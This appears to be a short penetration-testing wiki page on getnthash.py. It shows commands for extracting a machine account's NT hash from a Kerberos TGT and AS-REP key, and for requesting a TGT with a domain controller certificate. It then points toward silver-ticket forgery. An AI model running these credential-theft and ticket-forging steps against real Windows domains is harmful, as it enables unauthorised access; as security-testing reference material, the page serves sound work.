# getnthash.py
Helps to get the NT hash of things (after using [gettgtpkinit.py](/pentesting/internal/gettgtpkinit) to get the AS-REP key that accompanies a TGT, for example).

## Extract NT hash
This step requires the AS-REP key you got as part of using gettgtpkinit
```
export KRB5CCNAME=x.ccache
getnthash.py domain.com/server123\$ -key THE-AS-REP-HASH 
```

## Request a TGT using a certificate and private key
```
gettgtpkinit.py -cert-pfx dc.pfx -pfx-pass 123456 domain.com/dc$ dc.ccache
```

Armed with this hash, you could grab the domain SID with [lookupsid](/pentesting/internal/lookupsid) and then forge a silver ticket with [ticketer](/pentesting/internal/ticketer).